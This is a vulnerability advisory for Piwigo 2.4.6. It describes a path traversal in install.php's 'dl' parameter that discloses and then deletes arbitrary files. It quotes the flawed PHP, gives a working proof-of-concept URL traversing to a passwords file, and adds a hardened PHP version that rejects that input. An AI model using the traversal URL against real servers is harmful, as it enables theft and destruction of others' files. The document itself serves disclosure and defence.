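Piwigo is a photo gallery script written in PHP.

Piwigo 2.4.6 and other versions do not properly validate the value of the 'dl' parameter of the install.php script. This implementation flaw allows an attacker to view arbitrary files on the affected computer and to delete arbitrary files within the context of the affected application.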
====================================================================
/install.php (lines 113-124):
-----------------------------
// 'dl' comes straight from the query string and is appended to the path unvalidated
if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
{
  $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
  header('Cache-Control: no-cache, must-revalidate');
  header('Pragma: no-cache');
  header('Content-Disposition: attachment; filename="database.inc.php"');
  header('Content-Transfer-Encoding: binary');
  header('Content-Length: '.filesize($filename));
  // the same attacker-influenced path is first disclosed, then deleted
  echo file_get_contents($filename);
  unlink($filename);
  exit();
}
====================================================================

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843

15.02.2013

--

http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
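
A hardened form of the install.php download branch quoted above, as an added example that is neither Piwigo's vendor patch nor code from the advisory. The helper name resolve_download_path() is hypothetical and the allow-list pattern for 'dl' is an assumption. Because the same path feeds both file_get_contents() and unlink(), one check covers the read and the delete.

```php
<?php
// Added example, not Piwigo's patch. resolve_download_path() is a hypothetical
// helper and the allow-list pattern for 'dl' is an assumption.
function resolve_download_path(string $dataDir, $dl): ?string
{
    // 1. Allow-list: accept only a short plain token, which rules out '/',
    //    '\', '..', NUL bytes and array-valued parameters (?dl[]=x).
    if (!is_string($dl) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $dl)) {
        return null;
    }

    // 2. Canonicalise both paths; realpath() returns false for missing paths.
    $base = realpath($dataDir);
    $path = realpath($dataDir . DIRECTORY_SEPARATOR . 'pwg_' . $dl);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }

    // 3. Containment: the resolved file must sit directly in the data
    //    directory, which also catches symlinks that point elsewhere.
    return dirname($path) === $base ? $path : null;
}

// Constructed demo: a temporary data directory holding one legitimate file.
$dataDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pwg_demo_' . getmypid();
mkdir($dataDir);
file_put_contents($dataDir . DIRECTORY_SEPARATOR . 'pwg_abc123', "<?php // config\n");

// A valid token, the traversal value from the advisory, a missing file, an array.
$inputs = ['abc123', '../../../../../../lio_passwords.txt', 'missing', ['x']];
foreach ($inputs as $dl) {
    $resolved = resolve_download_path($dataDir, $dl);
    printf("%-45s %s\n", json_encode($dl, JSON_UNESCAPED_SLASHES),
        $resolved === null ? 'rejected' : 'served');
}

unlink($dataDir . DIRECTORY_SEPARATOR . 'pwg_abc123');
rmdir($dataDir);
```

Only the first input is served; the other three are rejected before any file is read or deleted.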